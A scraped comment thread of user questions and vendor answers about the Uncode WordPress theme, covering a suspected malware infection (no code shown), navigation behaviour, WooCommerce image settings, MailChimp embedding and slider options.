Hi! We have used the Uncode Theme for two years now and we’re very happy with it. Just recently though a bunch of “html code” is showing up where the header is placed on every page of our website. (See code below)

Unfortunately this is the first time we see this error (you can verify is not part of any of the customers websites https://undsgn.com/uncode/showcase/) and I also see some codes that are not native of Uncode. The impression is that you have some malicious code. My suggestion is to disable first all extra plugins you have (I see a few), then perform a back up and update to the new version. You have a very old version so it’s important you backup your site first, please follow instructions for “Update to Uncode 1.8 (or later versions) from an earlier version”: https://support.undsgn.com/hc/articles/214001205

Hi! I have been using this theme for over a year and love it. One thing that has been driving me crazy though — it is never obvious to me on the yes/no toggles which is the positive indicator: the grey or the white side. PLEASE consider adding more obvious visual hints in your next version!

Is it possible to make the menu logo for a specific page link to a custom URL (different than the global menu)?

No unfortunately this is not possible, is normal that a site logo points to the homepage, if you have a particular setup you should workaround, for example it should be not easy with a few JavaScript code. Hi Guys, I’ve got a question: The first link of the One Page Navigation only opens the actual page after a double click. With the first click only the sub-points go out. But is there a way to open the page directly?
I’m sorry, I have to formulate my question more precisely. It’s about the template in the left column. This opens basically only after a double-click the actual page.

Not sure to understand but if you refer to the menu it’s not possible, if a menu item as children it cannot be a direct link, in fact on mobile (and lateral menu) it’s used to open the submenu. I hope this make sense.
Is there a way to report discovered bugs? I’ve found that if you hide a row in the Responsive Section (e.g. for Desktop), it still shows up there as dot (incl. Row Name) in the Scroll Navigation.
Hi maxruebensal! We know about this but there is no method to workaround, when you work on a onepage scroll page you should hide the contents inside the row (insert contents in an inner row and hide/show this inner row) and not the main row. Unfortunately main rows cannot be hidden if you work with dots and hashtags.
Is Uncode compatible with GeoDirectory?
Is it possible to have a mobile UI like ListingPro? To answer this question please navigate in the classic listingpro demo using a smart phone. I wonder if the Phone Email and Map icon can be integrated in the same way?

Bug find: Safari on mobile (iphone 6S) does not disable slides on scroll when checked on the page settings.

Does Uncode use Woocommerce product thumbnails on Product Archive pages? It seems that my Woocommerce product image settings have no effect – if UAI is off, the full size original product image is used (scaled down); if UAI is on, a smaller product image is used (with -uai-XXXxXXX.jpg on the end) but it is the same aspect ratio as the original file (not square as is specified in woocommerce settings)

Can you please help me with MailChimp integrations. When I input the generated code from MailChimp in WordPress header.php, I get only a blank page with pop up. Blog posts are not displayed at all and return error in the console:

I thought I just needed to change the ‘media layout’ from ‘Theme Options>Single>Product>Content’ but it doesn’t provide me the right options.

Unfortunately after so many years it’s the first time I heard something like this, are you sure this happen only with Uncode and it’s not caused by some WordPress, server settings or you have a cache plugin (the page is cached and you don’t see changes until the cache expires)?

Lately, I’ve been using Uncode Slider instead of Slider Revolution, because it seems faster, however it doesn’t have the option to show sliders at random :/
Is there a way I can achive that quickly? Will you ever add that option in future updates?

Hi AtelierAlves, yep the Uncode slider is lighter than Slider Revolution but it’s not possible right now have random slides and there is not a quick code I can suggest to make this working, sorry.
